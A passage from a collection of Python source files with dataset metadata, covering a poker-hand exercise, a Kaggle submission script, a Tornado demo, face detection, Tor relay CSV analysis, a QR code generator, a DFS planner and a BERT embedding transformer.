1, 1, 1) else\n 0), ranks\n\n\ndef unzip(pairs): return zip(*pairs)\n\n\ndef group(ranks):\n groups = [(ranks.count(x), x) for x in set(ranks)]\n return sorted(groups, reverse=True)\n\n\ndef hand_rank_better(hand):\n \" counts is the count of each rank; ranks lists corresponding ranks\"\n # counts is the count of each rank; ranks lists corresponding card_ranks\n # '7 T 7 9 7' --> counts = (3,1,1); ranks = (7, 10 , 9)\n groups = group(['--23456789TJQKA'.index(r) for r, s in hand])\n counts, ranks = unzip(groups)\n if ranks == (14, 5, 4, 3, 2):\n ranks = (5, 4, 3, 2, 1)\n straight = len(ranks) == 5 and max(ranks) - min(ranks) == 4\n flush = len(set([s for r, s in hand])) == 1\n return max(count_rankings[counts], 4 * straight + 5 * flush), ranks\n\n\ncount_rankings = {(5,): 10, (4, 1): 7, (3, 2): 6, (3, 1, 1): 3,\n (2, 2, 1): 2, (2, 1, 1, 1): 1, (1, 1, 1, 1, 1): 0}\n# %%\n# Luka version\n\n\ndef card_ranks_ls(cards):\n \"Return a list of the ranks, sorted with higher first.\"\n ranks = [r for r, s in cards]\n change_ranks = {\"T\": 10, \"J\": 11, \"Q\": 12, \"K\": 13, \"A\": 14}\n ranks = [change_ranks[i] if i in change_ranks.keys() else i for i in ranks]\n ranks.sort(reverse=True)\n return ranks\n\n\n# official\ndef card_ranks_ace_wrong(cards):\n \"Return a list of the ranks, sorted with higher first.\"\n ranks = ['--23456789TJQKA'.index(r) for r, s in cards]\n ranks.sort(reverse=True)\n return ranks\n\n# %%\n# Lesson1_18\n# User Instructions\n#\n# Define two functions, straight(ranks) and flush(hand).\n# Keep in mind that ranks will be ordered from largest\n# to smallest.\n\n# luka\n\n\ndef straight_ls(ranks):\n \"Return True if the ordered ranks form a 5-card straight.\"\n for i in range(len(ranks) - 1):\n if ranks[i] - 1 != ranks[i + 1]:\n return False\n return True\n\n\ndef flush_ls(hand):\n \"Return True if all the cards have the same suit.\"\n for i in range(len(hand) - 1):\n if hand[i][1] != hand[i + 1][1]:\n return False\n return True\n\n# official\n\n\ndef straight(ranks):\n \"Return True if the ordered ranks form a 5-card straight.\"\n return (max(ranks) - min(ranks) == 4) and len(set(ranks)) == 5\n\n\ndef flush(hand):\n \"Return True if all the cards have the same suit.\"\n suits = [s for r, s in hand]\n return len(set(suits)) == 1\n\n\n# %%\n# Lesson1_19\n# User Instructions\n#\n# Define a function, kind(n, ranks).\n\ndef kind_ls(n, ranks):\n \"\"\"Return the first rank that this hand has exactly n of.\n Return None if there is no n-of-a-kind in the hand.\"\"\"\n for _ in sorted(set(ranks), reverse=True):\n if ranks.count(_) == n:\n return _\n return None\n\n# official\n\n\ndef kind(n, ranks):\n \"\"\"Return the first rank that this hand has exactly n of.\n Return None if there is no n-of-a-kind in the hand.\"\"\"\n for r in ranks:\n if ranks.count(r) == n:\n return r\n return None\n\n# Lesson1_20\n# User Instructions\n#\n# Define a function, two_pair(ranks).\n\n\ndef two_pair_ls(ranks):\n \"\"\"If there are two pair, return the two ranks as a\n tuple: (highest, lowest); otherwise return None.\"\"\"\n uniqueRanks = sorted(set(ranks), reverse=True)\n if len(uniqueRanks) != 3 or ranks.count(uniqueRanks[0]) == 3 or ranks.count(uniqueRanks[1]) == 3 or ranks.count(uniqueRanks[2]) == 3:\n return None\n\n if ranks.count(uniqueRanks[0]) != 2:\n return (uniqueRanks[1], uniqueRanks[2])\n elif ranks.count(uniqueRanks[1]) != 2:\n return (uniqueRanks[0], uniqueRanks[2])\n else:\n return (uniqueRanks[0], uniqueRanks[1])\n\n\ndef two_pair_ls(ranks):\n \"\"\"If there are two pair, return the two ranks as a\n tuple: (highest, lowest); otherwise return None.\"\"\"\n pair = kind(2, ranks)\n lowpair = kind(2, list(reversed(ranks)))\n if pair and lowpair != pair:\n return (pair, lowpair)\n else:\n return Nonechrom\n\n# %% lesson1_23 block\n# official\n# Lesson1_23\n# User Instructions\n#\n# Modify the card_ranks(hand) function so that a\n# straight with a low ace (A, 2, 3, 4, 5) will be\n# properly identified as a straight by the\n# straight() function.\n\n\ndef card_ranks_ls_ace_fix(cards):\n \"Return a list of the ranks, sorted with higher first.\"\n ranks = ['--23456789TJQKA'.index(r) for r, s in cards]\n if (max(ranks) - min(ranks) == 12) and len(set(ranks)) == 5 and (ranks.count(14) == 1):\n ranks.remove(14)\n ranks.append(1)\n ranks.sort(reverse=True)\n\n return ranks\n\n# official solution ace fix\n\n\ndef card_ranks(cards):\n \"Return a list of the ranks, sorted with higher first.\"\n ranks = ['--23456789TJQKA'.index(r) for r, s in cards]\n ranks.sort(reverse=True)\n\n return [5, 4, 3, 2, 1] if (ranks == [14, 5, 4, 3, 2]) else ranks\n\n\n# al = \"AC 2D 4H 3D 5S\".split() # Ace-Low Straight\n# print(f'kraj: {straight(card_ranks(al))}')\n\n\n# %% lesson1_26 Deal\n# -----------\n# User Instructions\n#\n# Write a function, deal(numhands, n=5, deck), that\n# deals numhands hands with n cards each.\n#\n\n\n# This builds a deck of 52 cards. If you are unfamiliar\n# with this notation, check out Andy's supplemental video\n# on list comprehensions (you can find the link in the\n# Instructor Comments box below).\n\nmydeck = [r + s for r in '23456789TJQKA' for s in 'SHDC']\n\n\ndef deal(numhands, n=5, deck=mydeck):\n \"shuffle the deck and deal out numhands n-card hands.\"\n random.shuffle(deck)\n return [deck[n * i:n * (i + 1)] for i in range(numhands)]\n# %% test block\n\n\ndef test():\n \"Test cases for the functions in poker program.\"\n sf = \"6C 7C 8C 9C TC\".split() # Straight Flush\n fk = \"9D 9H 9S 9C 7D\".split() # Four of a Kind\n fh = \"TD TC TH 7C 7D\".split() # Full House\n tp = \"TD 9H TH 7C 3S\".split() # Two Pair\n fkranks = card_ranks(fk)\n tpranks = card_ranks(tp)\n assert kind(4, fkranks) == 9\n assert kind(3, fkranks) == None\n assert kind(2, fkranks) == None\n assert kind(1, fkranks) == 7\n return 'tests pass'\n\n\nprint(test())\n","sub_path":"Lesson1_poker.py","file_name":"Lesson1_poker.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"302254128","text":"import sys\n\nimport pandas as pd\nimport numpy as np\n\nfrom utils import print_step, rmse\n\nprint_step('Load train')\ntrain = pd.read_csv('processed_train.csv')\n\nprint_step('Load test')\ntest = pd.read_csv('processed_test.csv')\n\nprint_step('Gathering')\nIS_OOFS_MODE = len(sys.argv) == 2 and sys.argv[1] == 'add_oofs'\noof_data = {}\noof_g_data = {}\nsubmit_data = {}\nsubmit_g_data = {}\ntargets = ['TotalTimeStopped_p20', 'TotalTimeStopped_p40',\n 'TotalTimeStopped_p50', 'TotalTimeStopped_p60', 'TotalTimeStopped_p80',\n 'TimeFromFirstStop_p20', 'TimeFromFirstStop_p40',\n 'TimeFromFirstStop_p50', 'TimeFromFirstStop_p60',\n 'TimeFromFirstStop_p80', 'DistanceToFirstStop_p20',\n 'DistanceToFirstStop_p40', 'DistanceToFirstStop_p50',\n 'DistanceToFirstStop_p60', 'DistanceToFirstStop_p80']\nif IS_OOFS_MODE:\n print_step('[Adding lvl 1 OOF data]')\nfor target in targets:\n if 'TimeFromFirstStop' not in target and '40' not in target and '60' not in target: # These targets don't count\n label = target\n if IS_OOFS_MODE:\n label = label + '_w_oofs'\n oof_data[target] = pd.read_csv('{}_oof.csv'.format(label))\n oof_g_data[target] = pd.read_csv('{}_g_oof.csv'.format(label))\n submit_data[target] = pd.read_csv('{}_submit.csv'.format(label))\n submit_g_data[target] = pd.read_csv('{}_g_submit.csv'.format(label))\n\n\nprint_step('Compiling OOFs')\noofs = pd.concat(oof_data.values(), axis=1).reset_index(drop=True)\noofs_g = pd.concat(oof_g_data.values(), axis=1).reset_index(drop=True)\noofs_g.columns = [c + '_g' for c in oofs_g.columns]\n\nrmses_ = []\nfor target in oof_data.keys():\n label = target\n if IS_OOFS_MODE:\n label = label + '_w_oofs'\n oof_data[target]['target'] = train[target]\n rmse_ = rmse(oof_data[target]['target'], oof_data[target][label])\n print(target, rmse_)\n rmses_.append(rmse_)\nrmse_mean = np.mean(rmses_)\nprint('Mean', rmse_mean)\n\noofs3 = pd.concat([pd.DataFrame(x.values) for x in oof_data.values()], axis=0)\noofs3.columns = ['value', 'target']\n\nglobal_mean = rmse(oofs3['target'], oofs3['value'])\nprint('Global', global_mean)\n\nrmses_ = []\nfor target in oof_data.keys():\n label = target\n if IS_OOFS_MODE:\n label = label + '_w_oofs'\n oof_g_data[target]['target'] = train[target]\n rmse_ = rmse(oof_g_data[target]['target'], oof_g_data[target][label])\n print(target, rmse_)\n rmses_.append(rmse_)\ngroup_mean = np.mean(rmses_)\nprint('Group Mean', group_mean)\noofs3_g = pd.concat([pd.DataFrame(x.values) for x in oof_g_data.values()], axis=0)\noofs3_g.columns = ['value', 'target']\nglobal_mean2 = rmse(oofs3_g['target'], oofs3_g['value'])\nprint('Global2', global_mean2)\nprint('Projected LB', (global_mean / rmse_mean) * group_mean)\n\nimport pdb\npdb.set_trace()\n\nprint_step('Compiling Submit M')\nin_only = set(test['IntersectionId']) - set(train['IntersectionId'])\ntest['IntersectionIdIn'] = test['IntersectionId'].apply(lambda x: x in in_only)\n\nsubmit = pd.concat(submit_data.values(), axis=1).reset_index(drop=True)\nsubmit_g = pd.concat(submit_g_data.values(), axis=1).reset_index(drop=True)\nfor target in oof_data.keys():\n label = target\n if IS_OOFS_MODE:\n label = label + '_w_oofs'\n test.loc[test['IntersectionIdIn'] == True, target] = submit_g[test['IntersectionIdIn'] == True][label]\n test.loc[test['IntersectionIdIn'] == False, target] = submit[test['IntersectionIdIn'] == False][label]\n submit_data[target] = test[target]\n\nsubmit3 = pd.concat([pd.DataFrame(x.values) for x in submit_data.values()], axis=0)\nsubmit3.columns = ['Target']\nsubmit3 = submit3.reset_index(drop=True)\nsubmit3['TargetId'] = sum([['{}_{}'.format(d, c) for d in range(submit_data['TotalTimeStopped_p20'].shape[0])] for c in range(6)], [])\nsubmit3 = submit3.sort_values('TargetId').reset_index(drop=True)[['TargetId', 'Target']]\n\nprint_step('Saving Submit M')\nsubmit3.to_csv('submission_m.csv', index=False)\n\nif not IS_OOFS_MODE:\n print_step('Saving OOFs (train) 1/2')\n oofs.to_csv('oofs_train.csv', index=False)\n print_step('Saving OOFs (train) 2/2')\n oofs_g.to_csv('oofs_g_train.csv', index=False)\n\n print_step('Saving OOFs (test) 1/2')\n submit.to_csv('oofs_test.csv', index=False)\n print_step('Saving OOFs (test) 2/2')\n submit_g.columns = [c + '_g' for c in submit_g.columns]\n submit_g.to_csv('oofs_g_test.csv', index=False)\n","sub_path":"submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"147561664","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*- \n\nimport tornado.ioloop\nimport tornado.web\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n i = self.get_argument('i', 'hello')\n self.write(i + \", welcome you to read f911's website: www.fatework.com\")\n\n\ndef make_app():\n return tornado.web.Application([\n (r\"/\", MainHandler),\n ])\n\n\nif __name__ == \"__main__\":\n app = make_app()\n app.listen(8888)\n tornado.ioloop.IOLoop.current().start()\n\n\n# vim:nocp:ai:si:ci:et:ts=4:sts=4:sw=4:ft=python:ff=unix:fenc=utf-8:\n# EOF\n","sub_path":"python/qiwsir/08-tornado/say_hello_tornado.py","file_name":"say_hello_tornado.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"96769495","text":"\r\n\r\nclass Config:\r\n def __init__(self):\r\n self.lr = 1e-5\r\n self.batch_size = 30\r\n self.num_instances = 5\r\n self.dim = 512\r\n self.width = 224\r\n self.origin_width = 256\r\n self.ratio = 0.16\r\n self.alpha = 2\r\n self.beta = 50\r\n self.k = 16\r\n self.margin = 0.5\r\n self.log_name = 'VGG16_V5'\r\n self.init = 'random'\r\n self.freeze_BN = True\r\n self.data = 'cub'\r\n self.data_root = ''\r\n self.net = 'VGG16_V5'\r\n self.epochs = 1000\r\n self.save_step = 30\r\n self.resume = None #pretrained model path\r\n self.print_freq = 5 #show loss\r\n self.save_dir = 'saved_model' #model_save dir\r\n self.nThreads = 8\r\n self.momentum = 0.9\r\n self.weight_decay = 5e-4\r\n self.loss_base = 0.75\r\n self.loss = 'Binomial'\r\n self.use_reg = False\r\n self.pool_feature = False\r\n self.gallery_eq_query =True\r\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"409415353","text":"#!/usr/bin/python3\n'''Simple face detection demo of OpenCV3 under Python 3'''\n\nimport cv2\nimport sys\nimport numpy as np\nfrom PIL import Image\n\n## training\ncascPath = './training_data/haarcascade_frontalface_default.xml'\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\ncv2.namedWindow('faces', cv2.WINDOW_NORMAL)\n\n## read frame\nimg = cv2.imread(sys.argv[1])\n\n## face detection\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nfaces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30,30),\n flags=cv2.CASCADE_SCALE_IMAGE\n)\n \n## put rectangle box over detected face\nfor (x, y, w, h) in faces:\n cv2.rectangle(img, (x,y),(x+w,y+h), (0,255,0),2)\n \ncv2.imshow('faces', img)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","sub_path":"object_detection/face_detection_by_pic.py","file_name":"face_detection_by_pic.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"86428796","text":"# !/usr/bin/env python\n# coding: utf-8\n\"\"\"\n# file : 文件读写.py\n# author : shao\n# date: 2017/10/28 0028\n\"\"\"\nimport csv\n\nimport pandas as pd\nfrom pylab import *\n\n# 指定中文字体\nmpl.rcParams[\"font.sans-serif\"]=['SimHei']\n\n\ndef read_data(file='./relays.csv'):\n\t# 定义一个字典存储文件数据,然后返回\n\tdata_dict=[]\n\treader=csv.DictReader(open(file))\n\tfor row in reader:\n\t\tname=row['Name']\n\t\tfingerprint=row['Fingerprint']\n\t\tflags=row['Flags']\n\t\tip=row['IP']\n\t\torport=row['OrPort']\n\t\tobservedBW=row['ObservedBW']\n\t\tuptime=row['Uptime']\n\t\tguardclients=row['GuardClients']\n\t\tdirclients=row['DirClients']\n\t\tlongitude=row['Longitude']\n\t\tlatitude=row.get('Latitude','')\n\t\t\n\t\trowinfo=[str(name),str(fingerprint),str(flags),\n\t\t\t\t str(ip),str(orport),str(observedBW),str(uptime),\n\t\t\t\t str(guardclients),str(dirclients),str(longitude),\n\t\t\t\t str(latitude)]\n\t\t#\n\t\t\n\t\t# 输出对应的字段\n\t\t# print(rowinformation)\n\t\tdata_dict.append(rowinfo)\n\treturn data_dict\n\n\ndef write_data(source,file):\n\twith open(file,'w',newline='') as csvfile:\n\t\theader=['Name','Fingerprint','Flags','IP','OrPort',\n\t\t\t\t'ObservedBW','Uptime','GuardClient','DirClient',\n\t\t\t\t'Longitude','Latitude']\n\t\t# file_writer=csv.DictWriter(csvfile,fieldnames=header)\n\t\tfile_writer=csv.writer(csvfile,dialect='excel')\n\t\t# 将表头先写入csv 文件,然后将数据写入\n\t\tfile_writer.writerow(header)\n\t\tfor line in source:\n\t\t\t# print(line)\n\t\t\tfile_writer.writerow(line)\n\n\n# 进行数据分析\ndef data_analysis(filename):\n\t\"\"\"\n:param data_records: List[List[str]]\n:return: void\n\"\"\"\n\tfieldsname=['Name','Fingerprint','Flags','IP','OrPort',\n\t\t\t\t'ObservedBW','Uptime','GuardClient','DirClient',\n\t\t\t\t'Longitude','Latitude']\n\tdata=pd.read_csv(filename,sep=',')\n\t# print(data[:2])\n\t# 根据数据列Flags进行分组,显示前100名的Flags内容\n\tflags_by_ratings=data.groupby('Flags').size()\n\tprint(\"排名前100的Flags项目如下:\")\n\tprint(flags_by_ratings[:100])\n\t\n\t# 绘制直方图\n\txlabel_flags=[\"M\",\"ME\",\"MEH\",\"MG\",\"MGE\",\"MGEH\",\"MGH\",\"MH\"]\n\tylabel_flags=list(flags_by_ratings.ix[:])\n\t\n\t#\n\t# 绘制折线图 figure.1\n\t# print(xlabel_flags,ylabel_flags)\n\t# plt.plot(range(len(xlabel_flags)), ylabel_flags)\n\t# # 将横轴数字显示成文本\n\t# plt.xticks(range(len(xlabel_flags)), xlabel_flags)\n\t# plt.xlabel(u'Flags类别')\n\t# plt.ylabel(u'统计数据')\n\t# plt.title(\"Flags分布统计图\")\n\t# plt.show()\n\t\n\t# 绘制柱状图Bar: figure.2\n\txbar=np.arange(len(xlabel_flags))\n\tybar=ylabel_flags\n\tplt.bar(xbar,ybar,facecolor=\"#ee3300\",edgecolor=\"white\")\n\tplt.xticks(range(len(xlabel_flags)),xlabel_flags)\n\t\n\t# 增加数据标签,显示直方图上的文字\n\tfor x,y in zip(xbar,ybar):\n\t\tplt.text(x,y,'%d'%y,ha=\"center\",va=\"bottom\")\n\t\n\tplt.xlabel(u'Flags类别')\n\tplt.ylabel(u'统计数据')\n\tplt.title(\"Flags分布统计图\")\n\tplt.show()\n\t\n\t# 在一张图表中显示\n\t\n\tprint(\"------------------------------------\")\n\tactive_flags=flags_by_ratings.index[flags_by_ratings>=50]\n\tprint(\"Flags中出现次数大于50的项目列表:\")\n\t# print(active_flags)\n\t\n\tprint('------------------------------------')\n\tprint('统计观察带宽在每一个区间的分布情况:')\n\tdata_groupbyBW=data.groupby('ObservedBW').size()\n\t# print(data_groupbyBW)\n\t\n\tprint('-------------------------------------')\n\tprint('统计OrPort对应的结点个数:')\n\t\n\tprint('-------------------------------------')\n\tprint('统计每一个IP对应的国家信息')\n\t\n\tprint('-------------------------------------')\n\tprint('输出统计描述:')\n\tprint(data.describe())\n\t\n\t# 进行分类算法\n\n\nif __name__=='__main__':\n\t# 从csv数据文件中读取数据\n\t# data_dict = read_data()\n\t# print(data_dict)\n\t# write_data(source=data_dict, file='./data.csv')\n\tdata_analysis('./data.csv')\n","sub_path":"basic/csv文件读写.py","file_name":"csv文件读写.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"295048688","text":"import shutil\nimport Tamanho as tam\n\nfrom pathlib import Path\n\n# Criação da pasta imagens\ncaminho = ('./imagens')\nPath(caminho).mkdir(exist_ok=True)\n\n# Entrada\nlink = input('Seu link: ')\nnome = input('Nome do QR Code: ')\n\n# Setar tamanho do QR Code\nqr = tam.EscolhaTamanho()\n\n# Processamento\nqr.add_data(link)\nqr.make(fit = True)\nlink = qr.make_image( fill_color = \"black\", back_color=\"white\")\n\n# Saída: Salvando QR Code e movendo para a pasta \"imagens\"\nlink.save(f'{nome}.png')\n\nsource = f'./{nome}.png'\nshutil.move(source,caminho)\n\nprint(f'\\nA imagem foi gerada em: {caminho}/{nome}.png !')","sub_path":"Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"403157282","text":"def trials(N = 1000, n = 100):\n \"\"\" \n N = how many times will run\n n = how many time run Sim()\n will collect all the data into a dictionary of lists\n \"\"\"\n data = {}\n trial = [0 for i in range(n+1)]\n test_wins = 0\n \n for test in range(N):\n test_wins = sim(n = n)\n trial[test_wins] += 1\n \n data[(0,0)] = trial\n \n for die1 in range (1,7):\n \n for die2 in range (die1, 7):\n trial = [0 for i in range(n+1)]\n \n for test in range(N):\n test_wins = sim(n = n, weight1 = die1, weight2 = die2)\n trial[test_wins] += 1\n \n data[(die1, die2)] = trial\n \n trial = [0 for i in range(n+1)] \n \n for test in range(N):\n test_wins = sim(n = n, weight1 = die1)\n trial[test_wins] += 1 \n \n data[(die1, 0)] = trial\n \n return data","sub_path":"Trials.py","file_name":"Trials.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"654514184","text":"# BERT document embeddings\nimport pandas as pd\nimport numpy as np\nimport torch\nimport transformers as ppb # pytorch transformers\nfrom sklearn.base import TransformerMixin\n\ndata_file = pd.read_csv(r'COVID19_Dataset-text_labels_only.csv')\ntweets = np.asarray(data_file['Tweet'].copy())\ntargets = np.asarray(data_file['Is_Unreliable'].copy())\n\nfor i in range(np.shape(tweets)[0]):\n tweets[i] = tweets[i].lower()\n\nclass Text2Embed(TransformerMixin):\n \"\"\" Description:\n Transformer that takes in a list of strings, constructs word embeddings\n using BERT, and then provides the text embeddings of a (new) list of texts\n depending on which words in the \"vocab\" occur in the (new) strings.\n \"\"\"\n\n # initialize class & private variables\n def __init__(self):\n\n self.corpus = None\n #self.X = None\n self.text_embeddings = None\n \n # Load pretrained model/tokenizer\n model_class, tokenizer_class, pretrained_weights = (ppb.BertModel, ppb.BertTokenizer, 'bert-base-uncased')\n self.tokenizer = tokenizer_class.from_pretrained(pretrained_weights)\n self.model = model_class.from_pretrained(pretrained_weights)\n\n def fit(self, corpus, y=None):\n\n \"\"\" Do nothing because BERT will be used in transform method. Return self.\n\n Params:\n corpus: list of strings\n\n Returns: self\n \"\"\"\n\n return self\n\n def transform(self, new_corpus=None, y=None):\n\n \"\"\" Get text embeddings for given corpus, using BERT embeddings.\n\n Returns: text embeddings (shape: num texts by embedding dimensions)\n \"\"\"\n \n # Load pretrained model/tokenizer\n tokenizer = self.tokenizer\n model = self.model\n \n for k in range(len(new_corpus)):\n text = new_corpus[k]\n \n tokenized = tokenizer.encode(text.lower(), add_special_tokens=True)\n #tokenized = np.array(tokenized)\n \n # max length of tweet tokens is 83 (from Saswat's code); pad all vectors\n maxi = 83\n #padded = list()\n #padded.append(np.array(tokenized + [0]*(maxi - len(tokenized))))\n padded = np.array(tokenized + [0]*(maxi - len(tokenized)))\n \n segment_ids = [1]*len(padded) # to tell BERT that all tokens are in the same sequence (tweet)\n \n # create tensors\n tokens_tensor = torch.tensor([padded])\n segments_tensor = torch.tensor([segment_ids])\n \n with torch.no_grad():\n last_hidden_states = model(tokens_tensor, segments_tensor)[0] # pull out only the last hidden state\n \n last_hidden_states = last_hidden_states.numpy() # dim: tweets x words x features (where tweets = 1)\n \n text_vec = last_hidden_states[0,0,:] # pull out first document (bc there's only one tweet each time) and first token vector (for [CLS] token); dim: features = 768\n \n if k == 0:\n full_matrix = text_vec\n else:\n full_matrix = np.vstack((full_matrix, text_vec))\n\n self.text_embeddings = full_matrix\n\n return self.text_embeddings.copy()\n\n\n# instantiate embedder\nembedder = Text2Embed()\nembedder.fit(data_file['Tweet'])\n\n# get BERT embeddings\nembedded_tweets = embedder.transform(data_file['Tweet'])\n\n# save array of embedded tweets\nnp.save('bert_embeddings', embedded_tweets)\n","sub_path":"first_paper_submission/23Jan2021/classification_redo_BERT/BERT_create_embeddings_redo.py","file_name":"BERT_create_embeddings_redo.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"352246362","text":"#\n# HW1 - Part 1\n# Sorter Program\n# 3 Oct 18\n#\n# Dr. Travis Mayberry \n# SY301\n#\n\nimport sys\n\nprint('This program will sort three numbers\\n')\n\nwhile True: \n\n try: \n print('Please enter the first number: ') \n int1 = int(input())\n\n except ValueError: \n print('Not an int...') \n continue\n\n if int1 == \"\": \n print('You have to enter something...')\n continue\n\n else: \n break\n\nwhile True: \n\n try: \n print('Please enter the second number: ') \n int2 = int(input())\n\n except ValueError: \n print('Not an int...') \n continue\n\n if int2 == \"\": \n print('You have to enter something...')\n continue\n\n else: \n break\n\n\nwhile True: \n\n try: \n print('Please enter the third number: ') \n int3 = int(input())\n\n except ValueError: \n print('Not an int...') \n continue\n\n if int3 == \"\": \n print('You have to enter something...')\n continue\n\n else: \n break\n\n\nmaxint = max(int1, int2, int3)\nminint = min(int1, int2, int3)\nmidint = (int1 + int2 + int3) - (maxint + minint)\n\nprint('Sorted: ' + str(minint) + ',' + str(midint) + ',' + str(maxint)) \n\n\n\n","sub_path":"hw/hw1_sorter.py","file_name":"hw1_sorter.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"482233245","text":"import random\nimport os\n\n\ndef main():\n\n basedir = os.path.dirname(os.path.realpath(__file__))\n quote_source = os.path.join(basedir, 'productive_quotes.txt')\n\n with open(quote_source, 'r') as f:\n quotes = f.read().split('\\n\\n')\n\n quote = quotes[random.randint(0, len(quotes) - 1)]\n\n print()\n print(quote)\n print()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"inspire_me.py","file_name":"inspire_me.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"473161926","text":"import datetime \nimport numpy as np\n\nclass DepthFirstPlanner(object):\n \n def __init__(self, planning_env, visualize):\n self.planning_env = planning_env\n self.visualize = visualize\n self.nodes = dict()\n\n def plotEdge(self, src_id, dst_id):\n src_coord = self.planning_env.discrete_env.NodeIdToConfiguration(src_id)\n dst_coord = self.planning_env.discrete_env.NodeIdToConfiguration(dst_id)\n self.planning_env.PlotEdge(src_coord, dst_coord)\n\n def Plan(self, start_config, goal_config):\n \n # Here you will implement the depth first planner\n # The return path should be a numpy array\n # of dimension k x n where k is the number of waypoints\n # and n is the dimension of the robots configuration space\n\n if self.visualize and hasattr(self.planning_env, 'InitializePlot'):\n self.planning_env.InitializePlot(goal_config)\n\n print('DFS planning ...')\n print('Start State ...', start_config)\n print('Goal State ...', goal_config)\n\n start_id = self.planning_env.discrete_env.ConfigurationToNodeId(start_config)\n goal_id = self.planning_env.discrete_env.ConfigurationToNodeId(goal_config)\n\n print('Start State ID ...', start_id)\n print('Goal State ID ...', goal_id)\n\n stk = []\n stk.append((start_id, None))\n\n closest_dist2goal = self.planning_env.ComputeDistance(start_id, goal_id)\n closest_node = start_id\n\n start = datetime.datetime.now() \n visited = {} \n while (len(stk) > 0):\n (node_id, parent_id) = stk.pop()\n if node_id in visited:\n continue\n\n dist2goal = self.planning_env.ComputeDistance(node_id, goal_id)\n if dist2goal < closest_dist2goal:\n closest_dist2goal = dist2goal\n closest_node = node_id\n\n visited[node_id] = parent_id\n \n if (node_id != start_id):\n self.plotEdge(node_id, parent_id)\n \n if (len(visited) % 5 ==0):\n print('Closest dist to goal : ', closest_dist2goal)\n \n if (node_id == goal_id):\n print('Goal found')\n break\n\n successors = self.planning_env.GetSuccessors(node_id)\n if len(successors) != 0: \n for succ_id in successors:\n if succ_id not in visited:\n stk.append((succ_id, node_id))\n else:\n print('No successors for ', node_id)\n \n path = [goal_id]\n while path[-1] != start_id:\n path.append(visited[path[-1]])\n \n plan = [self.planning_env.discrete_env.NodeIdToConfiguration(node) for node in path[::-1]]\n elapsed = (datetime.datetime.now() - start).seconds\n print('Plan length :', len(plan))\n print('Nodes visited:', len(visited))\n print('Elapsed time:', elapsed)\n return np.array(plan)\n","sub_path":"robot_autonomy/hw3/code/DepthFirstPlanner.py","file_name":"DepthFirstPlanner.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"17117350","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 13:21:54 2019\n\n@author: GEORGEDICKINSON\n\"\"\"\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport h5py\nimport os\nimport shutil\nfrom sklearn import cluster, datasets, mixture\nfrom sklearn.neighbors import kneighbors_graph\nfrom itertools import cycle, islice\nfrom sklearn.preprocessing import StandardScaler, scale\nfrom scipy.ndimage import gaussian_filter, distance_transform_edt, label\nfrom skimage.filters import threshold_local\nfrom skimage.color import rgb2gray\nfrom skimage import measure\nfrom skimage.feature import peak_local_max\nfrom skimage.morphology import watershed\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport pandasql as ps\n\n#picasso hdf5 format (with averaging): ['frame', 'x', 'y', 'photons', 'sx', 'sy', 'bg', 'lpx', 'lpy', 'group']\n#Column Name |\tDescription |\tC Data Type\n#frame\t |The frame in which the localization occurred, starting with zero for the first frame.\t |unsigned long\n#x |The subpixel x coordinate in camera pixels\t |float\n#y\t |The subpixel y coordinate in camera pixels\t |float\n#photons\t |The total number of detected photons from this event, not including background or camera offset\t |float\n#sx\t |The Point Spread Function width in camera pixels |\tfloat\n#sy\t |The Point Spread Function height in camera pixels |\tfloat\n#bg\t |The number of background photons per pixel, not including the camera offset |\tfloat\n#lpx\t |The localization precision in x direction, in camera pixels, as estimated by the Cramer-Rao Lower Bound of the Maximum Likelihood fit. |\tfloat\n#lpy\t |The localization precision in y direction, in camera pixels, as estimated by the Cramer-Rao Lower Bound of the Maximum Likelihood fit. |\tfloat\n\n\n#set filepath\n\n#filtered by photons averaged dataset\nfilePath = r\"D:\\data\\2019-07-22\\20190722_FlowCell_Chris_Triangles_ANDJRectangle_TEST_2ROW_300msExp_Mid-9nt-3nM_MgCl2_18mM_PCA_12mM_PCD_TROLOX_1mM_13_30_59-locs_locs_render_DRIFT_3_picked2_filtered_avg.hdf5\"\nbackgroundCenteroids = np.array([[256.195,255.898],[255.898,256.204], [255.743,255.843]])\n\n\nsavePath = filePath.split('.')[0] + 